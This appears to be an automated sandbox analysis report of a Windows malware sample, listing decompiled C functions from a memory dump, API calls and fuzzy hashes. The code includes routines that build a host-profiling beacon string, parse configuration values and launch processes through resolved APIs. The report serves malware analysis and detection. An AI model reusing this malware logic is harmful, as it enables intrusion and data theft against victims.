                                                          • Opcode ID: 70b506ef5b7b124e7ad1a5f0a3943d7f174ebc93e8d47d25ecf82941f30abf6e
                                                          • Instruction ID: 49c126267fd43f697d1763ab61a96d3a0c032c432fcab0302e3f64acc40db80b
                                                          • Opcode Fuzzy Hash: 70b506ef5b7b124e7ad1a5f0a3943d7f174ebc93e8d47d25ecf82941f30abf6e
                                                          • Instruction Fuzzy Hash: 71F0E775D01218EFDB00DBA4C988AEDB7B8EF19705F1480ABE502A7240F7B46B85DF61
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E04675D7D(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, WCHAR* _a20) {
                                                          				void* _t17;
                                                          
                                                          				if(_a4 == 0) {
                                                          					L2:
                                                          					return E04676002(_a8, 1, _a12, _a16, _a20, lstrlenW(_a20) + _t14 + 2);
                                                          				}
                                                          				_t17 = E04676207(_a4, _a8, _a12, _a16, _a20); // executed
                                                          				if(_t17 != 0) {
                                                          					goto L2;
                                                          				}
                                                          				return _t17;
                                                          			}





                                                          APIs
                                                          • lstrlenW.KERNEL32(?,?,?,04678708,3D0467C0,80000002,04673741,0467A513,74666F53,4D4C4B48,0467A513,?,3D0467C0,80000002,04673741,?), ref: 04675DA2
                                                            • Part of subcall function 04676207: SysAllocString.OLEAUT32(0467A513), ref: 04676220
                                                            • Part of subcall function 04676207: SysFreeString.OLEAUT32(00000000), ref: 04676261
                                                          Memory Dump Source
                                                          • Source File: 00000021.00000002.441722403.0000000004671000.00000020.00000001.sdmp, Offset: 04670000, based on PE: true
                                                          • Associated: 00000021.00000002.441685163.0000000004670000.00000004.00000001.sdmp
                                                          • Associated: 00000021.00000002.441773564.000000000467C000.00000002.00000001.sdmp
                                                          • Associated: 00000021.00000002.441805771.000000000467D000.00000004.00000001.sdmp
                                                          • Associated: 00000021.00000002.441874516.000000000467F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: String$AllocFreelstrlen
                                                          • String ID:
                                                          • API String ID: 3808004451-0
                                                          • Opcode ID: 0ed66d8c4b81ecde1b5c536fa63320eb16a2675bdf9ba008f4c8f3cb9191c341
                                                          • Instruction ID: 15fb57c5197554bf319a43dbe6a18f0b6c8fa186a74ae8717011a093f43f007c
                                                          • Opcode Fuzzy Hash: 0ed66d8c4b81ecde1b5c536fa63320eb16a2675bdf9ba008f4c8f3cb9191c341
                                                          • Instruction Fuzzy Hash: 6CF02B7201020EBFDF169F94DD0AEEA3F6AEB18354F048019FA1554161E772E9B1EBA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Non-executed Functions

                                                          C-Code - Quality: 95%
                                                          			E0467888E(int* __ecx) {
                                                          				int _v8;
                                                          				void* _v12;
                                                          				void* _v16;
                                                          				void* __esi;
                                                          				signed int _t26;
                                                          				signed int _t31;
                                                          				signed int _t37;
                                                          				char* _t43;
                                                          				char* _t44;
                                                          				char* _t45;
                                                          				char* _t46;
                                                          				char* _t47;
                                                          				void* _t48;
                                                          				void* _t49;
                                                          				void* _t50;
                                                          				intOrPtr _t51;
                                                          				void* _t53;
                                                          				intOrPtr _t54;
                                                          				intOrPtr _t55;
                                                          				signed int _t58;
                                                          				intOrPtr _t61;
                                                          				signed int _t62;
                                                          				signed int _t67;
                                                          				void* _t69;
                                                          				void* _t70;
                                                          				signed int _t72;
                                                          				signed int _t76;
                                                          				signed int _t80;
                                                          				signed int _t84;
                                                          				signed int _t88;
                                                          				signed int _t92;
                                                          				void* _t97;
                                                          				intOrPtr _t114;
                                                          
                                                          				_t98 = __ecx;
                                                          				_t26 =  *0x467d2a4; // 0x63699bc3
                                                          				if(E04677145( &_v8,  &_v12, _t26 ^ 0x8241c5a7) != 0 && _v12 >= 0x90) {
                                                          					 *0x467d2d8 = _v8;
                                                          				}
                                                          				_t31 =  *0x467d2a4; // 0x63699bc3
                                                          				if(E04677145( &_v16,  &_v12, _t31 ^ 0x0b822240) == 0) {
                                                          					_v12 = 2;
                                                          					L62:
                                                          					return _v12;
                                                          				}
                                                          				_t37 =  *0x467d2a4; // 0x63699bc3
                                                          				if(E04677145( &_v12,  &_v8, _t37 ^ 0xecd84622) == 0) {
                                                          					L60:
                                                          					HeapFree( *0x467d238, 0, _v16);
                                                          					goto L62;
                                                          				} else {
                                                          					_t97 = _v12;
                                                          					if(_t97 == 0) {
                                                          						_t43 = 0;
                                                          					} else {
                                                          						_t92 =  *0x467d2a4; // 0x63699bc3
                                                          						_t43 = E04676B2E(_t98, _t97, _t92 ^ 0x724e87bc);
                                                          					}
                                                          					if(_t43 != 0) {
                                                          						_t98 =  &_v8;
                                                          						if(StrToIntExA(_t43, 0,  &_v8) != 0) {
                                                          							 *0x467d240 = _v8;
                                                          						}
                                                          					}
                                                          					if(_t97 == 0) {
                                                          						_t44 = 0;
                                                          					} else {
                                                          						_t88 =  *0x467d2a4; // 0x63699bc3
                                                          						_t44 = E04676B2E(_t98, _t97, _t88 ^ 0x2b40cc40);
                                                          					}
                                                          					if(_t44 != 0) {
                                                          						_t98 =  &_v8;
                                                          						if(StrToIntExA(_t44, 0,  &_v8) != 0) {
                                                          							 *0x467d244 = _v8;
                                                          						}
                                                          					}
                                                          					if(_t97 == 0) {
                                                          						_t45 = 0;
                                                          					} else {
                                                          						_t84 =  *0x467d2a4; // 0x63699bc3
                                                          						_t45 = E04676B2E(_t98, _t97, _t84 ^ 0x3b27c2e6);
                                                          					}
                                                          					if(_t45 != 0) {
                                                          						_t98 =  &_v8;
                                                          						if(StrToIntExA(_t45, 0,  &_v8) != 0) {
                                                          							 *0x467d248 = _v8;
                                                          						}
                                                          					}
                                                          					if(_t97 == 0) {
                                                          						_t46 = 0;
                                                          					} else {
                                                          						_t80 =  *0x467d2a4; // 0x63699bc3
                                                          						_t46 = E04676B2E(_t98, _t97, _t80 ^ 0x0602e249);
                                                          					}
                                                          					if(_t46 != 0) {
                                                          						_t98 =  &_v8;
                                                          						if(StrToIntExA(_t46, 0,  &_v8) != 0) {
                                                          							 *0x467d004 = _v8;
                                                          						}
                                                          					}
                                                          					if(_t97 == 0) {
                                                          						_t47 = 0;
                                                          					} else {
                                                          						_t76 =  *0x467d2a4; // 0x63699bc3
                                                          						_t47 = E04676B2E(_t98, _t97, _t76 ^ 0x3603764c);
                                                          					}
                                                          					if(_t47 != 0) {
                                                          						_t98 =  &_v8;
                                                          						if(StrToIntExA(_t47, 0,  &_v8) != 0) {
                                                          							 *0x467d02c = _v8;
                                                          						}
                                                          					}
                                                          					if(_t97 == 0) {
                                                          						_t48 = 0;
                                                          					} else {
                                                          						_t72 =  *0x467d2a4; // 0x63699bc3
                                                          						_t48 = E04676B2E(_t98, _t97, _t72 ^ 0x2cc1f2fd);
                                                          					}
                                                          					if(_t48 != 0) {
                                                          						_push(_t48);
                                                          						_t69 = 0x10;
                                                          						_t70 = E046756FA(_t69);
                                                          						if(_t70 != 0) {
                                                          							_push(_t70);
                                                          							E04676702();
                                                          						}
                                                          					}
                                                          					if(_t97 == 0) {
                                                          						_t49 = 0;
                                                          					} else {
                                                          						_t67 =  *0x467d2a4; // 0x63699bc3
                                                          						_t49 = E04676B2E(_t98, _t97, _t67 ^ 0xb30fc035);
                                                          					}
                                                          					if(_t49 != 0 && E046756FA(0, _t49) != 0) {
                                                          						_t114 =  *0x467d32c; // 0x4af95b0
                                                          						E046723F4(_t114 + 4, _t65);
                                                          					}
                                                          					if(_t97 == 0) {
                                                          						_t50 = 0;
                                                          					} else {
                                                          						_t62 =  *0x467d2a4; // 0x63699bc3
                                                          						_t50 = E04676B2E(_t98, _t97, _t62 ^ 0x372ab5b7);
                                                          					}
                                                          					if(_t50 == 0) {
                                                          						L52:
                                                          						_t51 =  *0x467d2a8; // 0x47a5a8
                                                          						_t20 = _t51 + 0x467e252; // 0x616d692f
                                                          						 *0x467d2d4 = _t20;
                                                          						goto L53;
                                                          					} else {
                                                          						_t61 = E046756FA(0, _t50);
                                                          						 *0x467d2d4 = _t61;
                                                          						if(_t61 != 0) {
                                                          							L53:
                                                          							if(_t97 == 0) {
                                                          								_t53 = 0;
                                                          							} else {
                                                          								_t58 =  *0x467d2a4; // 0x63699bc3
                                                          								_t53 = E04676B2E(_t98, _t97, _t58 ^ 0xd8dc5cde);
                                                          							}
                                                          							if(_t53 == 0) {
                                                          								_t54 =  *0x467d2a8; // 0x47a5a8
                                                          								_t21 = _t54 + 0x467e791; // 0x6976612e
                                                          								_t55 = _t21;
                                                          							} else {
                                                          								_t55 = E046756FA(0, _t53);
                                                          							}
                                                          							 *0x467d340 = _t55;
                                                          							HeapFree( *0x467d238, 0, _t97);
                                                          							_v12 = 0;
                                                          							goto L60;
                                                          						}
                                                          						goto L52;
                                                          					}
                                                          				}
                                                          			}





































                                                          APIs
                                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,04675D25,?,63699BC3,?,04675D25,63699BC3,?,04675D25,63699BC3,00000005,0467D00C,00000008), ref: 04678933
                                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,04675D25,?,63699BC3,?,04675D25,63699BC3,?,04675D25,63699BC3,00000005,0467D00C,00000008), ref: 04678965
                                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,04675D25,?,63699BC3,?,04675D25,63699BC3,?,04675D25,63699BC3,00000005,0467D00C,00000008), ref: 04678997
                                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,04675D25,?,63699BC3,?,04675D25,63699BC3,?,04675D25,63699BC3,00000005,0467D00C,00000008), ref: 046789C9
                                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,04675D25,?,63699BC3,?,04675D25,63699BC3,?,04675D25,63699BC3,00000005,0467D00C,00000008), ref: 046789FB
                                                          • HeapFree.KERNEL32(00000000,04675D25,04675D25,?,63699BC3,?,04675D25,63699BC3,?,04675D25,63699BC3,00000005,0467D00C,00000008,?,04675D25), ref: 04678AF2
                                                          • HeapFree.KERNEL32(00000000,?,04675D25,?,63699BC3,?,04675D25,63699BC3,?,04675D25,63699BC3,00000005,0467D00C,00000008,?,04675D25), ref: 04678B05
                                                          Memory Dump Source
                                                          • Source File: 00000021.00000002.441722403.0000000004671000.00000020.00000001.sdmp, Offset: 04670000, based on PE: true
                                                          • Associated: 00000021.00000002.441685163.0000000004670000.00000004.00000001.sdmp
                                                          • Associated: 00000021.00000002.441773564.000000000467C000.00000002.00000001.sdmp
                                                          • Associated: 00000021.00000002.441805771.000000000467D000.00000004.00000001.sdmp
                                                          • Associated: 00000021.00000002.441874516.000000000467F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: FreeHeap
                                                          • String ID:
                                                          • API String ID: 3298025750-0
                                                          • Opcode ID: 094b8725308da299601da0c35b0b00d03631d1fc36c093d8a5037541fe65cdf5
                                                          • Instruction ID: 91d52ae814d46c578dadeebe819a4b0e8b0db3a373c6025c0c42f155a9158c9c
                                                          • Opcode Fuzzy Hash: 094b8725308da299601da0c35b0b00d03631d1fc36c093d8a5037541fe65cdf5
                                                          • Instruction Fuzzy Hash: 05718D70B00105AFEB14FBB9D988D5BB7EDEF987407281D25A602D7204FA39FD428B25
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 66%
                                                          			E04671F13(long __eax, void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, void* _a16, void* _a24, intOrPtr _a32) {
                                                          				intOrPtr _v0;
                                                          				intOrPtr _v4;
                                                          				intOrPtr _v16;
                                                          				intOrPtr _v24;
                                                          				intOrPtr _v28;
                                                          				void* _v44;
                                                          				intOrPtr _v52;
                                                          				void* __edi;
                                                          				long _t25;
                                                          				intOrPtr _t26;
                                                          				intOrPtr _t27;
                                                          				intOrPtr _t28;
                                                          				intOrPtr _t29;
                                                          				intOrPtr _t30;
                                                          				void* _t33;
                                                          				intOrPtr _t34;
                                                          				int _t37;
                                                          				intOrPtr _t42;
                                                          				intOrPtr _t43;
                                                          				intOrPtr _t50;
                                                          				intOrPtr _t54;
                                                          				intOrPtr* _t56;
                                                          				intOrPtr _t62;
                                                          				intOrPtr _t68;
                                                          				intOrPtr _t71;
                                                          				intOrPtr _t74;
                                                          				int _t77;
                                                          				intOrPtr _t78;
                                                          				int _t81;
                                                          				intOrPtr _t83;
                                                          				int _t86;
                                                          				intOrPtr* _t89;
                                                          				intOrPtr* _t90;
                                                          				void* _t91;
                                                          				void* _t95;
                                                          				void* _t96;
                                                          				void* _t97;
                                                          				intOrPtr _t98;
                                                          				void* _t100;
                                                          				int _t101;
                                                          				void* _t102;
                                                          				void* _t103;
                                                          				void* _t105;
                                                          				void* _t106;
                                                          				void* _t108;
                                                          
                                                          				_t95 = __edx;
                                                          				_t91 = __ecx;
                                                          				_t25 = __eax;
                                                          				_t105 = _a16;
                                                          				_v4 = 8;
                                                          				if(__eax == 0) {
                                                          					_t25 = GetTickCount();
                                                          				}
                                                          				_t26 =  *0x467d018; // 0xf1c1aee9
                                                          				asm("bswap eax");
                                                          				_t27 =  *0x467d014; // 0x3a87c8cd
                                                          				asm("bswap eax");
                                                          				_t28 =  *0x467d010; // 0xd8d2f808
                                                          				asm("bswap eax");
                                                          				_t29 =  *0x467d00c; // 0xeec43f25
                                                          				asm("bswap eax");
                                                          				_t30 =  *0x467d2a8; // 0x47a5a8
                                                          				_t3 = _t30 + 0x467e633; // 0x74666f73
                                                          				_t101 = wsprintfA(_t105, _t3, 2, 0x3d15e, _t29, _t28, _t27, _t26,  *0x467d02c,  *0x467d004, _t25);
                                                          				_t33 = E046756CD();
                                                          				_t34 =  *0x467d2a8; // 0x47a5a8
                                                          				_t4 = _t34 + 0x467e673; // 0x74707526
                                                          				_t37 = wsprintfA(_t101 + _t105, _t4, _t33);
                                                          				_t108 = _t106 + 0x38;
                                                          				_t102 = _t101 + _t37;
                                                          				_t96 = E046758DB(_t91);
                                                          				if(_t96 != 0) {
                                                          					_t83 =  *0x467d2a8; // 0x47a5a8
                                                          					_t6 = _t83 + 0x467e8d4; // 0x736e6426
                                                          					_t86 = wsprintfA(_t102 + _t105, _t6, _t96);
                                                          					_t108 = _t108 + 0xc;
                                                          					_t102 = _t102 + _t86;
                                                          					HeapFree( *0x467d238, 0, _t96);
                                                          				}
                                                          				_t97 = E0467A199();
                                                          				if(_t97 != 0) {
                                                          					_t78 =  *0x467d2a8; // 0x47a5a8
                                                          					_t8 = _t78 + 0x467e8dc; // 0x6f687726
                                                          					_t81 = wsprintfA(_t102 + _t105, _t8, _t97);
                                                          					_t108 = _t108 + 0xc;
                                                          					_t102 = _t102 + _t81;
                                                          					HeapFree( *0x467d238, 0, _t97);
                                                          				}
                                                          				_t98 =  *0x467d32c; // 0x4af95b0
                                                          				_a32 = E04674622( &E0467D00A, _t98 + 4);
                                                          				_t42 =  *0x467d2d0; // 0x0
                                                          				if(_t42 != 0) {
                                                          					_t74 =  *0x467d2a8; // 0x47a5a8
                                                          					_t11 = _t74 + 0x467e8b6; // 0x3d736f26
                                                          					_t77 = wsprintfA(_t102 + _t105, _t11, _t42);
                                                          					_t108 = _t108 + 0xc;
                                                          					_t102 = _t102 + _t77;
                                                          				}
                                                          				_t43 =  *0x467d2cc; // 0x0
                                                          				if(_t43 != 0) {
                                                          					_t71 =  *0x467d2a8; // 0x47a5a8
                                                          					_t13 = _t71 + 0x467e88d; // 0x3d706926
                                                          					wsprintfA(_t102 + _t105, _t13, _t43);
                                                          				}
                                                          				if(_a32 != 0) {
                                                          					_t100 = RtlAllocateHeap( *0x467d238, 0, 0x800);
                                                          					if(_t100 != 0) {
                                                          						E0467518F(GetTickCount());
                                                          						_t50 =  *0x467d32c; // 0x4af95b0
                                                          						__imp__(_t50 + 0x40);
                                                          						asm("lock xadd [eax], ecx");
                                                          						_t54 =  *0x467d32c; // 0x4af95b0
                                                          						__imp__(_t54 + 0x40);
                                                          						_t56 =  *0x467d32c; // 0x4af95b0
                                                          						_t103 = E04671BB6(1, _t95, _t105,  *_t56);
                                                          						asm("lock xadd [eax], ecx");
                                                          						if(_t103 != 0) {
                                                          							StrTrimA(_t103, 0x467c28c);
                                                          							_push(_t103);
                                                          							_t62 = E0467361A();
                                                          							_v16 = _t62;
                                                          							if(_t62 != 0) {
                                                          								_t89 = __imp__;
                                                          								 *_t89(_t103, _v0);
                                                          								 *_t89(_t100, _a4);
                                                          								_t90 = __imp__;
                                                          								 *_t90(_t100, _v28);
                                                          								 *_t90(_t100, _t103);
                                                          								_t68 = E04676777(0xffffffffffffffff, _t100, _v28, _v24);
                                                          								_v52 = _t68;
                                                          								if(_t68 != 0 && _t68 != 0x10d2) {
                                                          									E04676761();
                                                          								}
                                                          								HeapFree( *0x467d238, 0, _v44);
                                                          							}
                                                          							HeapFree( *0x467d238, 0, _t103);
                                                          						}
                                                          						HeapFree( *0x467d238, 0, _t100);
                                                          					}
                                                          					HeapFree( *0x467d238, 0, _a24);
                                                          				}
                                                          				HeapFree( *0x467d238, 0, _t105);
                                                          				return _a12;
                                                          			}

















































                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 04671F2A
                                                          • wsprintfA.USER32 ref: 04671F77
                                                          • wsprintfA.USER32 ref: 04671F94
                                                          • wsprintfA.USER32 ref: 04671FB7
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 04671FC7
                                                          • wsprintfA.USER32 ref: 04671FE9
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 04671FF9
                                                          • wsprintfA.USER32 ref: 04672030
                                                          • wsprintfA.USER32 ref: 04672050
                                                          • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 0467206D
                                                          • GetTickCount.KERNEL32 ref: 0467207D
                                                          • RtlEnterCriticalSection.NTDLL(04AF9570), ref: 04672091
                                                          • RtlLeaveCriticalSection.NTDLL(04AF9570), ref: 046720AF
                                                            • Part of subcall function 04671BB6: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,7742C740,?,?,046720C2,?,04AF95B0), ref: 04671BE1
                                                            • Part of subcall function 04671BB6: lstrlen.KERNEL32(?,?,?,046720C2,?,04AF95B0), ref: 04671BE9
                                                            • Part of subcall function 04671BB6: strcpy.NTDLL ref: 04671C00
                                                            • Part of subcall function 04671BB6: lstrcat.KERNEL32(00000000,?), ref: 04671C0B
                                                            • Part of subcall function 04671BB6: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,046720C2,?,04AF95B0), ref: 04671C28
                                                          • StrTrimA.SHLWAPI(00000000,0467C28C,?,04AF95B0), ref: 046720E1
                                                            • Part of subcall function 0467361A: lstrlen.KERNEL32(04AF9A78,00000000,00000000,7742C740,046720ED,00000000), ref: 0467362A
                                                            • Part of subcall function 0467361A: lstrlen.KERNEL32(?), ref: 04673632
                                                            • Part of subcall function 0467361A: lstrcpy.KERNEL32(00000000,04AF9A78), ref: 04673646
                                                            • Part of subcall function 0467361A: lstrcat.KERNEL32(00000000,?), ref: 04673651
                                                          • lstrcpy.KERNEL32(00000000,?), ref: 04672100
                                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 04672107
                                                          • lstrcat.KERNEL32(00000000,?), ref: 04672114
                                                          • lstrcat.KERNEL32(00000000,00000000), ref: 04672118
                                                            • Part of subcall function 04676777: WaitForSingleObject.KERNEL32(00000000,00000000,00000000,74B481D0), ref: 04676829
                                                          • HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 04672148
                                                          • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 04672157
                                                          • HeapFree.KERNEL32(00000000,00000000,?,04AF95B0), ref: 04672166
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 04672178
                                                          • HeapFree.KERNEL32(00000000,?), ref: 04672187
                                                          Memory Dump Source
                                                          • Source File: 00000021.00000002.441722403.0000000004671000.00000020.00000001.sdmp, Offset: 04670000, based on PE: true
                                                          • Associated: 00000021.00000002.441685163.0000000004670000.00000004.00000001.sdmp
                                                          • Associated: 00000021.00000002.441773564.000000000467C000.00000002.00000001.sdmp
                                                          • Associated: 00000021.00000002.441805771.000000000467D000.00000004.00000001.sdmp
                                                          • Associated: 00000021.00000002.441874516.000000000467F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: Heap$Free$wsprintf$lstrcatlstrlen$lstrcpy$CountCriticalSectionTickTrim$AllocateEnterLeaveObjectSingleWaitstrcpy
                                                          • String ID:
                                                          • API String ID: 3080378247-0
                                                          • Opcode ID: d5cf5f43145b087f17472e4efb7b0d04b849a83d04e472da2f209c16c63c0e27
                                                          • Instruction ID: 01deeaa061adb8ded655184867b633cd3020c2f99fc04be7517eefcc695dd513
                                                          • Opcode Fuzzy Hash: d5cf5f43145b087f17472e4efb7b0d04b849a83d04e472da2f209c16c63c0e27
                                                          • Instruction Fuzzy Hash: EB616E71500204AFE715DB68EC48E5A77E9EF49394F041914FA09D7260FB3EEC06DBA5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 27%
                                                          			E04676C38(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
                                                          				intOrPtr _v8;
                                                          				intOrPtr _v12;
                                                          				long _v16;
                                                          				intOrPtr _v20;
                                                          				signed int _v24;
                                                          				void* __esi;
                                                          				long _t43;
                                                          				intOrPtr _t44;
                                                          				intOrPtr _t46;
                                                          				void* _t48;
                                                          				void* _t49;
                                                          				void* _t50;
                                                          				intOrPtr _t54;
                                                          				intOrPtr _t57;
                                                          				void* _t58;
                                                          				void* _t59;
                                                          				void* _t60;
                                                          				intOrPtr _t66;
                                                          				void* _t71;
                                                          				void* _t74;
                                                          				intOrPtr _t75;
                                                          				void* _t77;
                                                          				intOrPtr _t79;
                                                          				intOrPtr* _t80;
                                                          				intOrPtr _t91;
                                                          
                                                          				_t79 =  *0x467d33c; // 0x4af9798
                                                          				_v24 = 8;
                                                          				_t43 = GetTickCount();
                                                          				_push(5);
                                                          				_t74 = 0xa;
                                                          				_v16 = _t43;
                                                          				_t44 = E0467A557(_t74,  &_v16);
                                                          				_v8 = _t44;
                                                          				if(_t44 == 0) {
                                                          					_v8 = 0x467c18c;
                                                          				}
                                                          				_t46 = E046718A5(_t79);
                                                          				_v12 = _t46;
                                                          				if(_t46 != 0) {
                                                          					_t80 = __imp__;
                                                          					_t48 =  *_t80(_v8, _t71);
                                                          					_t49 =  *_t80(_v12);
                                                          					_t50 =  *_t80(_a4);
                                                          					_t54 = E0467A71F(lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + 0x102);
                                                          					_v20 = _t54;
                                                          					if(_t54 != 0) {
                                                          						_t75 =  *0x467d2a8; // 0x47a5a8
                                                          						_t16 = _t75 + 0x467eb08; // 0x530025
                                                          						 *0x467d118(_t54, _t16, _v8, _v8, _a4, _v12, _a8);
                                                          						_push(4);
                                                          						_t77 = 5;
                                                          						_t57 = E0467A557(_t77,  &_v16);
                                                          						_v8 = _t57;
                                                          						if(_t57 == 0) {
                                                          							_v8 = 0x467c190;
                                                          						}
                                                          						_t58 =  *_t80(_v8);
                                                          						_t59 =  *_t80(_v12);
                                                          						_t60 =  *_t80(_a4);
                                                          						_t91 = E0467A71F(lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + 0x13a);
                                                          						if(_t91 == 0) {
                                                          							E0467A734(_v20);
                                                          						} else {
                                                          							_t66 =  *0x467d2a8; // 0x47a5a8
                                                          							_t31 = _t66 + 0x467ec28; // 0x73006d
                                                          							 *0x467d118(_t91, _t31, _v8, _v8, _a4, _v12, _a12);
                                                          							 *_a16 = _v20;
                                                          							_v24 = _v24 & 0x00000000;
                                                          							 *_a20 = _t91;
                                                          						}
                                                          					}
                                                          					E0467A734(_v12);
                                                          				}
                                                          				return _v24;
                                                          			}

                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 04676C4D
                                                          • lstrlen.KERNEL32(?,80000002,00000005), ref: 04676C8D
                                                          • lstrlen.KERNEL32(00000000), ref: 04676C96
                                                          • lstrlen.KERNEL32(00000000), ref: 04676C9D
                                                          • lstrlenW.KERNEL32(80000002), ref: 04676CAA
                                                          • lstrlen.KERNEL32(?,00000004), ref: 04676D0A
                                                          • lstrlen.KERNEL32(?), ref: 04676D13
                                                          • lstrlen.KERNEL32(?), ref: 04676D1A
                                                          • lstrlenW.KERNEL32(?), ref: 04676D21
                                                            • Part of subcall function 0467A734: HeapFree.KERNEL32(00000000,00000000,04675637,00000000,?,?,00000000), ref: 0467A740
                                                          Memory Dump Source
                                                          • Source File: 00000021.00000002.441722403.0000000004671000.00000020.00000001.sdmp, Offset: 04670000, based on PE: true
                                                          • Associated: 00000021.00000002.441685163.0000000004670000.00000004.00000001.sdmp
                                                          • Associated: 00000021.00000002.441773564.000000000467C000.00000002.00000001.sdmp
                                                          • Associated: 00000021.00000002.441805771.000000000467D000.00000004.00000001.sdmp
                                                          • Associated: 00000021.00000002.441874516.000000000467F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: lstrlen$CountFreeHeapTick
                                                          • String ID:
                                                          • API String ID: 2535036572-0
                                                          • Opcode ID: 692e45da386faaa584ecf612ab7538964fc40f8c6074a46196d5ac21718d4f76
                                                          • Instruction ID: 8bec317f9a4270fe39f5be24bf9e788c3baeb555e756b4ec23bd058c63f91f0d
                                                          • Opcode Fuzzy Hash: 692e45da386faaa584ecf612ab7538964fc40f8c6074a46196d5ac21718d4f76
                                                          • Instruction Fuzzy Hash: A1414C76D00219FBDF12AFA4CC08D9E7BB5EF44358F054055EA04A7210EB36EE55DB94
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 73%
                                                          			E04678EA1(void* __eax, void* __ecx) {
                                                          				long _v8;
                                                          				char _v12;
                                                          				void* _v16;
                                                          				void* _v28;
                                                          				long _v32;
                                                          				void _v104;
                                                          				char _v108;
                                                          				long _t36;
                                                          				intOrPtr _t40;
                                                          				intOrPtr _t47;
                                                          				intOrPtr _t50;
                                                          				void* _t58;
                                                          				void* _t68;
                                                          				intOrPtr* _t70;
                                                          				intOrPtr* _t71;
                                                          
                                                          				_t1 = __eax + 0x14; // 0x74183966
                                                          				_t69 =  *_t1;
                                                          				_t36 = E0467592D(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16);
                                                          				_v8 = _t36;
                                                          				if(_t36 != 0) {
                                                          					L12:
                                                          					return _v8;
                                                          				}
                                                          				E0467A749( *((intOrPtr*)(_t69 + 0xc)),  *((intOrPtr*)(_t69 + 8)), _v12);
                                                          				_t40 = _v12(_v12);
                                                          				_v8 = _t40;
                                                          				if(_t40 == 0 && ( *0x467d260 & 0x00000001) != 0) {
                                                          					_v32 = 0;
                                                          					asm("stosd");
                                                          					asm("stosd");
                                                          					asm("stosd");
                                                          					_v108 = 0;
                                                          					memset( &_v104, 0, 0x40);
                                                          					_t47 =  *0x467d2a8; // 0x47a5a8
                                                          					_t18 = _t47 + 0x467e3e6; // 0x73797325
                                                          					_t68 = E04673C48(_t18);
                                                          					if(_t68 == 0) {
                                                          						_v8 = 8;
                                                          					} else {
                                                          						_t50 =  *0x467d2a8; // 0x47a5a8
                                                          						_t19 = _t50 + 0x467e747; // 0x4af8cef
                                                          						_t20 = _t50 + 0x467e0af; // 0x4e52454b
                                                          						_t71 = GetProcAddress(GetModuleHandleA(_t20), _t19);
                                                          						if(_t71 == 0) {
                                                          							_v8 = 0x7f;
                                                          						} else {
                                                          							_v108 = 0x44;
                                                          							E0467A62D();
                                                          							_t58 =  *_t71(0, _t68, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0);
                                                          							_push(1);
                                                          							E0467A62D();
                                                          							if(_t58 == 0) {
                                                          								_v8 = GetLastError();
                                                          							} else {
                                                          								CloseHandle(_v28);
                                                          								CloseHandle(_v32);
                                                          							}
                                                          						}
                                                          						HeapFree( *0x467d238, 0, _t68);
                                                          					}
                                                          				}
                                                          				_t70 = _v16;
                                                          				 *((intOrPtr*)(_t70 + 0x18))( *((intOrPtr*)(_t70 + 0x1c))( *_t70));
                                                          				E0467A734(_t70);
                                                          				goto L12;
                                                          			}

                                                          APIs
                                                            • Part of subcall function 0467592D: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,04678EBD,?,00000001,?,?,00000000,00000000), ref: 04675952
                                                            • Part of subcall function 0467592D: GetProcAddress.KERNEL32(00000000,7243775A), ref: 04675974
                                                            • Part of subcall function 0467592D: GetProcAddress.KERNEL32(00000000,614D775A), ref: 0467598A
                                                            • Part of subcall function 0467592D: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 046759A0
                                                            • Part of subcall function 0467592D: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 046759B6
                                                            • Part of subcall function 0467592D: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 046759CC
                                                          • memset.NTDLL ref: 04678F0B
                                                            • Part of subcall function 04673C48: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,74183966,00000000,04678F24,73797325), ref: 04673C59
                                                            • Part of subcall function 04673C48: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 04673C73
                                                          • GetModuleHandleA.KERNEL32(4E52454B,04AF8CEF,73797325), ref: 04678F41
                                                          • GetProcAddress.KERNEL32(00000000), ref: 04678F48
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 04678FB0
                                                            • Part of subcall function 0467A62D: GetProcAddress.KERNEL32(36776F57,0467A2D4), ref: 0467A648
                                                          • CloseHandle.KERNEL32(00000000,00000001), ref: 04678F8D
